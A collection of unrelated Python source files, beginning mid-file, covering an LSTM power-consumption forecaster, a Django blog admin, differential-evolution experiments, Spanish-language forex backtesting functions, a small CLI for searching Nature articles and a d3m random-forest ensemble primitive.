testPred = scaler.inverse_transform(testPred)
testY = scaler.inverse_transform(y_test)
# --- MSE --- #
trainScore = math.sqrt(mean_squared_error(trainY, trainPred))
testScore = math.sqrt(mean_squared_error(testY, testPred))
print("\n", "Train Score: %.1f RMSE" % (trainScore), "\n", " Test Score: %.1f RMSE" % (testScore))
error_scores = error_scores.append([{'epochs':e,'batch_size':b,'RMSE':testScore}], ignore_index=True)
return error_scores
#######################################
#### MAIN########################
################################
link = 'paldal_ward_field.csv'
data = loadData(link)
### resample data to hour frequence (to reduce data length)
data1 = data.resample('15min').mean().reindex(pd.date_range(data.index[0],data.index[-1],freq='H'))
## fill missing data with mean value
data1 = data1.fillna(data1['Power'].mean())
# --- split data1 to "train/test" --- #
train_data, test_data = splitData(data=data1, trainPercent=0.7, split_by_time=False)
# --- scaling --- #
train_data_sc, scaler = scale_to_0and1(train_data)
test_data_sc = scaler.transform(test_data)
# --- create data1set with window size --- #
inputTrain, ouputTrain = \
sequentialize(train_data_sc, train_data.index, window_size=168, to_ndarray=True)
inputTest, ouputTest = \
sequentialize(test_data_sc, test_data.index, window_size=168, to_ndarray=True)
# # --- create data1 matrix ---#
# # todo: understand "create_data1set" function
# trainX, trainY = create_data1set(train_data1, look_back=1)
# testX, testY = create_data1set(test_data1, look_back=1)
# --- change input (X) format for LSTM (reshape)--- #
### only with input data, output does not require reshape
inputTrain = reshapeForLSTM(inputTrain, time_steps=168)
inputTest = reshapeForLSTM(inputTest, time_steps=168)
# ###########tuning paramters
# epochs = [500, 1000, 1500, 2000, 2500, 3000]
# batch_size = [200, 400, 600, 800, 1000, 1200, 1400, 1600, 1800, 2000]
# error_scores = optimizing(X_train, y_train, X_test, y_test,epochs,batch_size)
# print(min(error_scores['RMSE']))
########### --- train LSTM network --- #
# todo: what "K.clear_session()" do...?
K.clear_session()
model = Sequential()
model.add(LSTM(units=200, input_shape=(168, 1))) # (timestep, feature)
model.add(Dense(units=1)) # output = 1
model.compile(loss="mean_squared_error", optimizer="adam")
model.summary()
# todo: inspect "EarlyStopping function()"
early_stop = EarlyStopping(monitor="loss", patience=5, verbose=1)
model.fit(inputTrain, ouputTrain, epochs=200, batch_size=168, verbose=2, callbacks=[early_stop])
###load model from file
model.save('LSTM_keras_BatchSize_168_HiddenSize_200.h5') ## save checkpoint
from keras.models import load_model
model = load_model('LSTM_keras_BatchSize_168_HiddenSize_200.h5') ### load checkpoint
# --- predict LSTM network --- #
# todo: fix codes below...!
trainPred = model.predict(inputTrain)
trainPred = scaler.inverse_transform(trainPred)
trainY = scaler.inverse_transform(ouputTrain)
testPred = model.predict(inputTest)
testPred = scaler.inverse_transform(testPred)
testY = scaler.inverse_transform(ouputTest)
# --- MSE --- #
trainScore = math.sqrt(mean_squared_error(trainY, trainPred))
testScore = math.sqrt(mean_squared_error(testY, testPred))
print("\n",
"Train Score: %.1f RMSE" % (trainScore), "\n",
" Test Score: %.1f RMSE" % (testScore))
### create a list to hold predicted values
forecastArray = []
### define forecast length
forecastLength = 240 ## 10 days
#### initialize input window
window = train_data_sc
for i in range(forecastLength):
#### sequentializing input data
inputTrain, outputTrain = sequentialize(window, data1.index[:len(window)], window_size=168,to_ndarray=True)
#### reshape input due to LSTM requirement
inputTrain = reshapeForLSTM(inputTrain, time_steps=168)
## predict output
predictedSequence = model.predict(inputTrain)
### reshape input data and put the last predicted value into
m = np.reshape(window, [len(window)])
m = np.append(m, predictedSequence[-1,0])
### also, put last predicted value into list
forecastArray.append(predictedSequence[-1,0])
print('Step: {} - predicted: {}'.format(i,predictedSequence[-1, 0]))
#### reshape input data for sequentializing
window = np.reshape(m, [len(m), 1])
###temporally saving predicted values (because it's take time to run prediction)
forecastIndex = data1.index[len(train_data):len(train_data)+forecastLength]
### convert forecast value into dataframe
df = pd.DataFrame(forecastArray)
df = scaler.inverse_transform(df)
### add index to forecasted data
df = pd.DataFrame(df, index=forecastIndex)
df.to_csv('PredictedPower_240Hour.csv')
#### plotting
plt.plot(df, label='Predicted')
plt.plot(test_data, label='Real')
plt.legend()
plt.close(all)
|
import models
from django.contrib import admin
from django.contrib.auth.models import User
class CategoryAdmin(admin.ModelAdmin):
prepopulated_fields = {"slug": ("title",)}
class CategoryToPostInline(admin.TabularInline):
model = models.CategoryToPost
extra = 1
class PostAdmin(admin.ModelAdmin):
prepopulated_fields = {"slug": ("title",)}
exclude = ('author',)
inlines = [CategoryToPostInline]
def save_model(self, request, obj, form, change):
obj.author = request.user
obj.save()
admin.site.register(models.Post, PostAdmin)
admin.site.register(models.Category, CategoryAdmin)
|
image_height = 594
image_width = 742
resized_image_size = 255
|
import numpy as np
import pandas as pd
from tqdm import tqdm
from src import bbde
from src.experiment_helpers.single_algorithm_stats import calculate_average_results, calculate_average_de_results
def run_experiments_for_cost_function(cost_function, cost_function_name, iterations, bounds, dimensions=10):
populations = [20, 40, 60, 80, 100, 120]
all_de_results = pd.DataFrame()
all_bbde_results = pd.DataFrame()
for popsize in tqdm(populations, leave=False, desc='populations'):
normalized_population, denorm_population = initialize_population(popsize, bounds * dimensions)
cross_probs = [0, 0.5]
for cross_probability in tqdm(cross_probs, leave=False, desc='cross probs'):
bin_de_results = calculate_average_de_results(
mutation=0.7,
xlabel='Iteracje',
ylabel='Wartość funkcji kosztu',
figname=f'de-{cost_function_name}-bin-{int(cross_probability*10)}-{popsize}.png',
normalized_population=normalized_population.copy(),
denorm_population=denorm_population.copy(),
cost_function=cost_function,
population_size=popsize,
cross_probability=cross_probability,
bounds=bounds * dimensions,
samples=25,
exp=False
)
all_de_results[f'bin{popsize}-{int(cross_probability * 10)}'] = bin_de_results['mean']
exp_de_results = calculate_average_de_results(
mutation=0.7,
xlabel='Iteracje',
ylabel='Wartość funkcji kosztu',
figname=f'de-{cost_function_name}-exp-{popsize}.png',
normalized_population=normalized_population.copy(),
denorm_population=denorm_population.copy(),
cost_function=cost_function,
population_size=popsize,
cross_probability=0.0,
bounds=bounds * dimensions,
samples=25,
exp=True
)
all_de_results[f'exp{popsize}'] = exp_de_results['mean']
bbde_results = calculate_average_results(
bbde.bbde,
xlabel='Iteracje',
ylabel='Wartość funkcji kosztu',
figname=f'bbde-{cost_function_name}-alt-{popsize}.png',
fobj=cost_function,
samples=25,
its=iterations,
pop=denorm_population.copy(),
alternative_exp_offset=True,
)
all_bbde_results[f'alt{popsize}'] = bbde_results['mean']
bbde_results = calculate_average_results(
bbde.bbde,
xlabel='Iteracje',
ylabel='Wartość funkcji kosztu',
figname=f'bbde-{cost_function_name}-nor-{popsize}.png',
fobj=cost_function,
samples=25,
its=iterations,
pop=denorm_population.copy(),
alternative_exp_offset=False,
)
all_bbde_results[f'nor{popsize}'] = bbde_results['mean']
return all_de_results, all_bbde_results
def initialize_population(population_size, bounds):
dimensions = len(bounds)
normalized_population = np.random.rand(population_size, dimensions)
# check if bounds are given in proper order
min_bound, max_bound = np.asarray(bounds).T
bounds_difference = np.fabs(min_bound - max_bound)
denorm_population = max_bound - bounds_difference * normalized_population
return normalized_population, denorm_population
|
# -- ------------------------------------------------------------------------------------ -- #
# -- proyecto: Microestructura y Sistemas de Trading - Proyecto Final - Sistema de Trading
# -- archivo: proceso.py - funciones para procesamiento de datos
# -- mantiene: IF Hermela Peña, IF Manuel Pintado
# -- repositorio: https://github.com/manuelpintado/Proyecto_Equipo_6.git
# -- ------------------------------------------------------------------------------------ -- #
# Importar librerias
import datos
import funciones as fn
from statsmodels.tsa.seasonal import seasonal_decompose
from statsmodels.tsa.stattools import adfuller
from statsmodels.stats.diagnostic import het_arch
from scipy.stats import shapiro
import numpy as np
import pandas as pd
# -- ----------------------------------------- FUNCION: Dicky Fuller Aumentada -- #
# -- Encontrar estacionariedad de la serie
def f_a_dicky_fuller(df_indicador):
"""
:param df_indicador: dataframe de serie de tiempo indicador
:return: pueba dick fuller aumentada e impresion de parametros hasta rechazar H0. nivelde confianza 95%
Debugging
--------
df_indicador = datos.f_leer_archivo(file_path='datos/Unemployment Rate - United States.csv')
"""
serie = df_indicador
a_dicky_fuller = adfuller(serie.Actual)
print('ADF Statistic: %f' % a_dicky_fuller[0])
print('p-value: %f' % a_dicky_fuller[1])
print('Critical Values:')
for key, value in a_dicky_fuller[4].items():
print('\t%s: %.3f' % (key, value))
i = 1
while a_dicky_fuller[1] > 0.05:
serie['Actual'] = serie['Actual'].diff()
serie.dropna(inplace=True)
a_dicky_fuller = adfuller(serie.Actual)
print('\n Transformada {}'.format(i))
print('ADF Statistic: %f' % a_dicky_fuller[0])
print('p-value: %f' % a_dicky_fuller[1])
print('Critical Values:')
for key, value in a_dicky_fuller[4].items():
print('\t%s: %.3f' % (key, value))
i += 1
serie.reset_index(inplace=True)
return a_dicky_fuller
# -- ----------------------------------------- FUNCION: Normalidad -- #
# -- Encontrar si la serie es normal
def f_normalidad(df_indicador):
"""
:param df_indicador: dataframe de la serie de tiempo del indicador
:return: informacion de la prueba de shapiro (t-stat y p-value)
Debugging
--------
df_indicador = datos.f_leer_archivo(file_path='datos/Unemployment Rate - United States.csv')
"""
shapiro_results = shapiro(df_indicador.Actual)
print('Prueba de normalidad: \n'
' H0: La serie es normal \n'
' H1: La serie no es normal \n')
if shapiro_results[1] <= 0.05:
print('P-value: {}'.format(shapiro_results[1]))
print('Se rechaza la H0, la serie no es normal')
else:
print('P-value: {}'.format(shapiro_results[1]))
print('Se acepta la H0, la serie es normal')
return shapiro_results
# -- ----------------------------------------- FUNCION: ARCH -- #
# -- Encontrar autoregresion
def f_heterocerasticidad(df_indicador):
"""
Parameters
----------
df_indicador
Returns
-------
"""
arch = het_arch(df_indicador['Actual'])
return arch
# -- ----------------------------------------- FUNCION: Estacionalidad -- #
# -- Encontrar estacionalidad
def f_estacionalidad(df_indicador):
"""
:param df_indicador: datos del indicador que sean estacionarios
:return: descomposicion de la serie para ver estacionalidad
Debugging
--------
df_indicaros = df_indicador
"""
resultado = seasonal_decompose(df_indicador['Actual'], period=1)
return resultado
# -- --------------------------------------------------------- FUNCION: Cargar y clasificar -- #
# -- Cargar archivo de historico indicador y clasificar cada ocurrencia
def f_clasificacion_ocurrencias(file_path: str, columns=None):
"""
:param file_path: lugar donde esta ubicado el archivo de los datos historicos del indicador
:param columns: columnas a tomar del archivo (opcional)
:return: dataframe del archivo agregando la clasificacion de cada ocurrencia
Debugging
--------
file_path = 'datos/Unemployment Rate - United States.csv'
"""
# Cargar información de archivos
df_indicador = datos.f_leer_archivo(file_path=file_path, columns=columns) # Historico de indicador
# Verificar que todas las columnas esten llenas y llenar datos faltantes
df_indicador = datos.f_validar_info(df_indicador)
# Asignar condicion a cada renglon de las diferentes
df_indicador['escenario'] = [fn.condition(row['Actual'], row['Consensus'], row['Previous'])
for index, row in df_indicador.iterrows()]
return df_indicador
# -- --------------------------------------------------------- FUNCION: Cargar y clasificar -- #
# -- Cargar archivo de historico indicador y clasificar cada ocurrencia
def f_metricas(df_indicador, load_file: bool = False):
"""
:param df_indicador: data frame con los datos de cuando se reporto el indicador y las columnas
- Actual
- Consensus
- Previous
:param load_file: Cargar un archivo con los datos historicos
:return: mismo dataframe con las sigueintes metricas
- Direccion: 1 = alcista, -1 = bajista
- Pips_alcistas: cantidad de pips que subio la ventana
- Pips_bajistas: cantidad de pips que bajo la ventana
- volatilidad diferencia entre maximo y minimo de la ventana
Debugging
--------
df_indicador = datos.f_leer_archivo(file_path='datos/Unemployment Rate - United States.csv')
"""
# obtener diccionario de ventanas de 30 min despues de indicador
if load_file:
dict_historicos = datos.load_pickle_file('datos/ventanas_historicos.pkl')
else:
dict_historicos = datos.f_ventanas_30_min(df=df_indicador)
# Agregar columnas de indicadores a df
df_indicador['direccion'] = 0
df_indicador['pips_alcistas'] = 0
df_indicador['pips_bajistas'] = 0
df_indicador['volatilidad'] = 0
# Inicializar contador
i = 0
# Ciclo para calcular indicadores basicos
for df in dict_historicos['historicos_sucesos'].values():
# obtener direccion de ventana
if df.Close.iloc[-1] - df.Open.iloc[0] >= 0:
df_indicador.loc[i, 'direccion'] = 1 # 1 = alcista
else:
df_indicador.loc[i, 'direccion'] = -1 # -1 = bajista
# obtener pips
df_indicador.loc[i, 'pips_alcistas'] = (df.High.max() - df.Open[0]) * 10000
df_indicador.loc[i, 'pips_bajistas'] = (df.Open[0] - df.Low.min()) * 10000
# obtener volatilidad de la ventana
df_indicador.loc[i, 'volatilidad'] = df.High.max() - df.Low.min()
# Contador
i += 1
return df_indicador
# -- --------------------------------------------------------- FUNCION: Backtest -- #
# -- Hacer backtest de datos historicos
def f_backtest(df_decisiones, df_hist, inversion_inicial: float):
"""
:param df_decisiones: dataframe de las decisiones para cada tipo de escenario del indicador (A,B,C,D)
:param df_hist: dataframe de cuando se emitio el indicador y que tipo de escenario es
:param inversion_inicial: monto inicial de la cuenta
:return: dataframe con el backtest para todos los escenarios del indicador
Debugging
--------
df_decisiones = df_decisiones
df_hist = train
inversion_inicial = 100000
"""
dict_ventanas = datos.load_pickle_file('datos/ventanas_historicos.pkl')['historicos_sucesos'] # Cargar ventanas
df_bt = df_hist.loc[:, ('DateTime', 'escenario')] # Extraer columnas necesarias de histrico
df_bt = df_bt.merge(df_decisiones.loc[:, ('escenario', 'operacion', 'volumen')], how='left', on='escenario')
df_bt = df_bt.reindex(columns=df_bt.columns.tolist() + ['resultado', 'pips']) # agregar columnas
# revisar ventanas
for i in df_bt.index:
ventana = dict_ventanas[str(df_bt['DateTime'][i])] # Tomar ventana para revisar
tp_sl = df_decisiones.loc[df_decisiones['escenario'] == df_bt['escenario'][i], ('tp', 'sl')]
if df_bt['operacion'][i] == 'buy':
for j in ventana.index:
if ventana.High[j] >= (ventana.Open[0] + tp_sl.iloc[0, 0] / 10000):
df_bt.loc[i, 'resultado'] = 'ganada'
df_bt.loc[i, 'pips'] = tp_sl.iloc[0, 0]
break
elif ventana.Low[j] <= (ventana.Open[0] - tp_sl.iloc[0, 1] / 10000):
df_bt.loc[i, 'resultado'] = 'perdida'
df_bt.loc[i, 'pips'] = -tp_sl.iloc[0, 1]
break
elif j == ventana.index[-1]:
df_bt.loc[i, 'resultado'] = 'ganada' if ventana.Close[j] >= ventana.Open[0] else 'perdida'
df_bt.loc[i, 'pips'] = (ventana.Close[j] - ventana.Open[0]) * 10000
else: # Operacion es sell
for j in ventana.index:
if ventana.Low[j] <= (ventana.Open[0] - tp_sl.iloc[0, 0] / 10000):
df_bt.loc[i, 'resultado'] = 'ganada'
df_bt.loc[i, 'pips'] = tp_sl.iloc[0, 0]
break
elif ventana.High[j] >= (ventana.Open[0] + tp_sl.iloc[0, 1] / 10000):
df_bt.loc[i, 'resultado'] = 'perdida'
df_bt.loc[i, 'pips'] = -tp_sl.iloc[0, 1]
break
elif j == ventana.index[-1]:
df_bt.loc[i, 'resultado'] = 'ganada' if ventana.Close[j] <= ventana.Open[0] else 'perdida'
df_bt.loc[i, 'pips'] = (ventana.Open[0] - ventana.Close[j]) * 10000
df_bt['capital'] = [df_bt['pips'][i] / 10000 * df_bt['volumen'][i] for i in df_bt.index]
df_bt['capital_acm'] = df_bt['capital'].cumsum() + inversion_inicial
return df_bt
def f_backtest_2(decisiones, df_hist, inversion_inicial: float):
"""
:param df_decisiones: dataframe de las decisiones para cada tipo de escenario del indicador (A,B,C,D)
:param df_hist: dataframe de cuando se emitio el indicador y que tipo de escenario es
:param inversion_inicial: monto inicial de la cuenta
:return: dataframe con el backtest para todos los escenarios del indicador
Debugging
--------
decisiones = np.array([100,200,100000,100,200,100000,100,200,100000,100,200,100000])
df_hist = train
inversion_inicial = 100000
"""
dict_ventanas = datos.load_pickle_file('datos/ventanas_historicos.pkl')['historicos_sucesos'] # Cargar ventanas
dates = np.array(df_hist['DateTime'])
escenario = np.array(df_hist['escenario'])
resultado = np.empty(len(dates), dtype='object')
pips = np.empty(len(dates))
operacion = np.empty(len(dates), dtype='object')
volumen = np.empty(len(dates))
# revisar ventanas
for i in range(len(dates)):
ventana = dict_ventanas[str(pd.to_datetime(dates[i]))] # Tomar ventana para revisar
open = np.array(ventana.Open)
high = np.array(ventana.High)
low = np.array(ventana.Low)
close = np.array(ventana.Close)
if escenario[i] == 'A':
sl_tp = np.array([decisiones[0], decisiones[1]])
volumen[i] = decisiones[2]
operacion[i] = 'venta'
elif escenario[i] == 'B':
sl_tp = np.array([decisiones[3], decisiones[4]])
volumen[i] = decisiones[5]
operacion[i] = 'compra'
elif escenario[i] == 'C':
sl_tp = np.array([decisiones[6], decisiones[7]])
volumen[i] = decisiones[8]
operacion[i] = 'venta'
else:
sl_tp = np.array([decisiones[9], decisiones[10]])
volumen[i] = decisiones[11]
operacion[i] = 'compra'
if operacion[i] == 'compra':
for j in range(len(open)):
if high[j] >= (open[0] + sl_tp[1] / 10000):
resultado[i] = 'ganada'
pips[i] = sl_tp[1]
break
elif low[j] <= (open[0] - sl_tp[0] / 10000):
resultado[i] = 'perdida'
pips[i] = -sl_tp[0]
break
elif j == len(open)-1:
resultado[i] = 'ganada' if close[j] >= open[0] else 'perdida'
pips[i] = (close[j] - open[0]) * 10000
else: # Operacion es sell
for j in range(len(open)):
if low[j] <= (open[0] - sl_tp[1] / 10000):
resultado[i] = 'ganada'
pips[i] = sl_tp[1]
break
elif high[j] >= (open[0] + sl_tp[0] / 10000):
resultado[i] = 'perdida'
pips[i] = -sl_tp[0]
break
elif j == len(open)-1:
resultado[i] = 'ganada' if close[j] <= open[0] else 'perdida'
pips[i] = (open[0] - close[j]) * 10000
capital = np.array(pips / 10000 * volumen)
capital_acm = capital.cumsum() + inversion_inicial
df_bt = pd.DataFrame({'DateTime': pd.to_datetime(dates),
'escenario': escenario,
'operacion': operacion,
'volumen': volumen,
'resultado': resultado,
'pips': pips,
'capital': capital,
'capital_acm': capital_acm})
return df_bt
|
from modules import capitalize
print (capitalize("hello"))
|
#! /usr/bin/env python
import argparse
from open_site import open_site
def run(args):
open_site(args.input, args.openBrowser)
def main():
parser = argparse.ArgumentParser(
description="This interface can be used to search through the nature research journal for articles of interest"
)
parser.add_argument(
"--input",
nargs="+",
help="This argument excepts the url to nature journal search bar and then the desired search term.",
dest="input",
type=str,
required=True,
)
parser.add_argument(
"--openBrowser",
help="This argument excepts True or False and if True will open the web page",
dest="openBrowser",
type=bool,
required=False,
default=False,
)
parser.set_defaults(func=run)
args = parser.parse_args()
args.func(args)
if __name__ == "__main__":
main()
|
#
# Copyright © 2021 Uncharted Software Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
from typing import List, Dict, Optional
import numpy as np
import pandas as pd
import shap
from sklearn.cluster import KMeans
from d3m import container, utils
from d3m.metadata import base as metadata_base, hyperparams, params
from d3m.primitive_interfaces import base
from d3m.primitive_interfaces.base import CallResult
from d3m.primitive_interfaces.supervised_learning import PrimitiveBase
from distil.modeling.forest import ForestCV
from distil.modeling.metrics import classification_metrics, regression_metrics
from distil.utils import CYTHON_DEP
import version
__all__ = ("EnsembleForest",)
logger = logging.getLogger(__name__)
class Hyperparams(hyperparams.Hyperparams):
metric = hyperparams.Enumeration[str](
values=classification_metrics + regression_metrics,
default="f1Macro",
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/ControlParameter"
],
description="The D3M scoring metric to use during the fit phase. This can be any of the regression, classification or "
+ "clustering metrics.",
)
shap_max_dataset_size = hyperparams.Hyperparameter[int](
default=1500,
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/ControlParameter"
],
description="The maximum dataset size on which to apply SHAP interpretation to each sample individually. Otherwise, this number of samples will be"
+ "drawn from the data distribution after clustering (to approximate the distribution) and interpretation will only be applied to these"
+ "samples",
)
n_estimators = hyperparams.UniformInt(
lower=1,
upper=2048,
default=32,
description="The number of trees in the forest.",
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/TuningParameter",
"https://metadata.datadrivendiscovery.org/types/ResourcesUseParameter",
],
)
min_samples_leaf = hyperparams.UniformInt(
lower=1,
upper=31,
default=2,
description="Minimum number of samples to split leaf",
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/TuningParameter",
"https://metadata.datadrivendiscovery.org/types/ResourcesUseParameter",
],
)
class_weight = hyperparams.Enumeration[str](
values=["None", "balanced", "balanced_subsample"],
default="None",
description="todo",
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/TuningParameter"
],
)
estimator = hyperparams.Enumeration[str](
values=["ExtraTrees", "RandomForest"],
default="ExtraTrees",
description="todo",
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/TuningParameter"
],
)
grid_search = hyperparams.Hyperparameter[bool](
default=False,
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/ControlParameter"
],
description="Runs an internal grid search to fit the primitive, ignoring caller supplied values for "
+ "n_estimators, min_samples_leaf, class_weight, estimator",
)
small_dataset_threshold = hyperparams.Hyperparameter[int](
default=2000,
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/ControlParameter"
],
description="If grid_search is true, controls the application of the 'small_dataset_fits' and 'large_dataset_fits' "
+ "parameters - if the input dataset has fewer rows than the threshold value, 'small_dateset_fits' will be used when fitting. "
+ "Otherwise, 'num_large_fits' is used.",
)
small_dataset_fits = hyperparams.Hyperparameter[int](
default=5,
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/ControlParameter"
],
description="If grid_search is true, the number of random forests to fit when using small datasets.",
)
large_dataset_fits = hyperparams.Hyperparameter[int](
default=1,
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/ControlParameter"
],
description="If grid_search is true, the number of random forests to fit when using large datasets.",
)
compute_confidences = hyperparams.Hyperparameter[bool](
default=False,
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/ControlParameter"
],
description="Compute confidence values. Only valid when the task is classification.",
)
n_jobs = hyperparams.Hyperparameter[int](
default=64,
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/ControlParameter"
],
description="The value of the n_jobs parameter for the joblib library",
)
pos_label = hyperparams.Hyperparameter[Optional[str]](
default=None,
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/ControlParameter"
],
description="Name of the positive label in the binary case. If none is provided, second column is assumed to be positive",
)
class Params(params.Params):
model: ForestCV
target_cols: List[str]
label_map: Dict[int, str]
needs_fit: bool
binary: bool
input_hash: pd.Series
class EnsembleForestPrimitive(
PrimitiveBase[container.DataFrame, container.DataFrame, Params, Hyperparams]
):
"""
Generates an ensemble of random forests, with the number of internal models created controlled by the size of the
input dataframe. It accepts a dataframe as input, and returns a dataframe consisting of prediction values only as output.
Columns with string structural types are ignored.
"""
metadata = metadata_base.PrimitiveMetadata(
{
"id": "e0ad06ce-b484-46b0-a478-c567e1ea7e02",
"version": version.__version__,
"name": "EnsembleForest",
"python_path": "d3m.primitives.learner.random_forest.DistilEnsembleForest",
"source": {
"name": "Distil",
"contact": "mailto:cbethune@uncharted.software",
"uris": [
"https://github.com/uncharted-distil/distil-primitives/blob/main/distil/primitives/ensemble_forest.py",
"https://github.com/uncharted-distil/distil-primitives",
],
},
"installation": [
CYTHON_DEP,
{
"type": metadata_base.PrimitiveInstallationType.PIP,
"package_uri": "git+https://github.com/uncharted-distil/distil-primitives.git@{git_commit}#egg=distil-primitives".format(
git_commit=utils.current_git_commit(os.path.dirname(__file__)),
),
},
],
"algorithm_types": [
metadata_base.PrimitiveAlgorithmType.RANDOM_FOREST,
],
"primitive_family": metadata_base.PrimitiveFamily.LEARNER,
},
)
def __init__(self, *, hyperparams: Hyperparams, random_seed: int = 0) -> None:
super().__init__(hyperparams=hyperparams, random_seed=random_seed)
# hack to get around typing constraints.
if self.hyperparams["class_weight"] == "None":
class_weight = None
else:
class_weight = self.hyperparams["class_weight"]
grid_search = self.hyperparams["grid_search"]
if grid_search is True:
current_hyperparams = None
else:
current_hyperparams = {
"estimator": self.hyperparams["estimator"],
"n_estimators": self.hyperparams[
"n_estimators"
], # [32, 64, 128, 256, 512, 1024, 2048],
"min_samples_leaf": self.hyperparams[
"min_samples_leaf"
], # '[1, 2, 4, 8, 16, 32],
}
if self.hyperparams["metric"] in classification_metrics:
current_hyperparams.update({"class_weight": class_weight})
else: # regression
current_hyperparams.update({"bootstrap": True})
self._model = ForestCV(
self.hyperparams["metric"],
random_seed=self.random_seed,
hyperparams=current_hyperparams,
grid_search=grid_search,
n_jobs=self.hyperparams["n_jobs"],
)
self._needs_fit = True
self._label_map: Dict[int, str] = {}
self._target_cols: List[str] = []
self._binary = False
def _get_component_columns(
self, output_df: container.DataFrame, source_col_index: int
) -> List[int]:
# Component columns are all column which have as source the referenced
# column index. This includes the aforementioned column index.
component_cols = [source_col_index]
# get the column name
col_name = output_df.metadata.query(
(metadata_base.ALL_ELEMENTS, source_col_index)
)["name"]
# get all columns which have this column as source
for c in range(0, len(output_df.columns)):
src = output_df.metadata.query((metadata_base.ALL_ELEMENTS, c))
if "source_column" in src and src["source_column"] == col_name:
component_cols.append(c)
return component_cols
def set_training_data(
self, *, inputs: container.DataFrame, outputs: container.DataFrame
) -> None:
# At this point anything that needed to be imputed should have been, so we'll
# clear out any remaining NaN values as a last measure.
# if we are doing classification the outputs need to be integer classes.
# label map is used to covert these back on produce.
col = outputs.columns[0]
if self._model.mode == "classification":
factor = pd.factorize(outputs[col])
outputs = pd.DataFrame(factor[0], columns=[col])
self._label_map = {k: v for k, v in enumerate(factor[1])}
self._target_cols = list(outputs.columns)
# remove nans from outputs, apply changes to inputs as well to ensure alignment
self._input_hash = pd.util.hash_pandas_object(inputs)
self._outputs = outputs[
outputs[col] != ""
].dropna() # not in place because we don't want to modify passed input
self._binary = self._outputs.iloc[:, 0].nunique(dropna=True) <= 2
row_diff = outputs.shape[0] - self._outputs.shape[0]
if row_diff != 0:
logger.warn(f"Removed {row_diff} rows due to NaN values in target data.")
self._inputs = inputs.loc[self._outputs.index, :]
else:
self._inputs = inputs
# same in other direction
inputs_rows = self._inputs.shape[0]
inputs_cols = self._inputs.shape[1]
self._inputs = self._inputs.select_dtypes(include="number")
col_diff = inputs_cols - self._inputs.shape[1]
if col_diff != 0:
logger.warn(f"Removed {col_diff} unencoded columns from training data.")
self._inputs = (
self._inputs.dropna()
) # not in place because because selection above doesn't create a copy
row_diff = inputs_rows - self._inputs.shape[0]
if row_diff != 0:
logger.warn(f"Removed {row_diff} rows due to NaN values in training data.")
self._outputs = self._outputs.loc[self._inputs.index, :]
self._model.num_fits = (
self.hyperparams["large_dataset_fits"]
if self._inputs.shape[0] > self.hyperparams["small_dataset_threshold"]
else self.hyperparams["small_dataset_fits"]
)
self._needs_fit = True
def fit(self, *, timeout: float = None, iterations: int = None) -> CallResult[None]:
logger.debug(f"Fitting {__name__}")
if self._needs_fit:
self._model.fit(self._inputs.values, self._outputs.values)
self._needs_fit = False
return CallResult(None)
def produce(
self,
*,
inputs: container.DataFrame,
timeout: float = None,
iterations: int = None,
) -> CallResult[container.DataFrame]:
logger.debug(f"Producing {__name__}")
# force a fit it hasn't yet been done
if self._needs_fit:
self.fit()
# drop any non-numeric columns
# drop all non-numeric columns
num_cols = inputs.shape[1]
inputs = inputs.select_dtypes(include="number")
col_diff = num_cols - inputs.shape[1]
if col_diff > 0:
logger.warn(f"Removed {col_diff} unencoded columns from produce data.")
# create dataframe to hold the result
result = self._model.predict(inputs.values)
if len(self._target_cols) > 1:
result_df = container.DataFrame()
for i, c in enumerate(self._target_cols):
col = container.DataFrame({c: result[:, i]})
result_df = pd.concat([result_df, col], axis=1)
for c in range(result_df.shape[1]):
result_df.metadata = result_df.metadata.add_semantic_type(
(metadata_base.ALL_ELEMENTS, c), "http://schema.org/Float"
)
else:
result_df = container.DataFrame(
{self._target_cols[0]: result}, generate_metadata=True
)
# if we mapped values earlier map them back.
if len(self._label_map) > 0:
# TODO label map will not work if there are multiple output columns.
result_df[self._target_cols[0]] = result_df[self._target_cols[0]].map(
self._label_map
)
# mark the semantic types on the dataframe
for i, _ in enumerate(result_df.columns):
result_df.metadata = result_df.metadata.add_semantic_type(
(metadata_base.ALL_ELEMENTS, i),
"https://metadata.datadrivendiscovery.org/types/PredictedTarget",
)
if (
self._model.mode == "classification"
and self.hyperparams["compute_confidences"]
):
confidence = self._model.predict_proba(inputs.values)
if self._binary:
pos_column = (
0 if self.hyperparams["pos_label"] == self._label_map[0] else 1
)
result_df.insert(
result_df.shape[1], "confidence", confidence[:, pos_column]
)
result_df.metadata = result_df.metadata.add_semantic_type(
(metadata_base.ALL_ELEMENTS, len(result_df.columns) - 1),
"http://schema.org/Float",
)
else:
# add confidence scores as some metrics require them.
confidence = pd.Series(confidence.tolist(), name="confidence")
result_df = pd.concat([result_df, confidence], axis=1)
confidences = [
item
for sublist in result_df["confidence"].values.tolist()
for item in sublist
]
labels = np.array(list(self._label_map.values()) * len(result_df))
index = [
item
for sublist in [
[i] * len(np.unique(labels)) for i in result_df.index
]
for item in sublist
]
result_df_temp = container.DataFrame()
result_df_temp["Class"] = labels
result_df_temp["confidence"] = confidences
result_df_temp.metadata = result_df.metadata
result_df_temp["index_temp"] = index
result_df_temp = result_df_temp.set_index("index_temp")
result_df = result_df_temp
result_df.metadata = result_df.metadata.add_semantic_type(
(metadata_base.ALL_ELEMENTS, len(result_df.columns) - 1),
"https://metadata.datadrivendiscovery.org/types/FloatVector",
)
result_df.metadata = result_df.metadata.add_semantic_type(
(metadata_base.ALL_ELEMENTS, len(result_df.columns) - 1),
"https://metadata.datadrivendiscovery.org/types/Score",
)
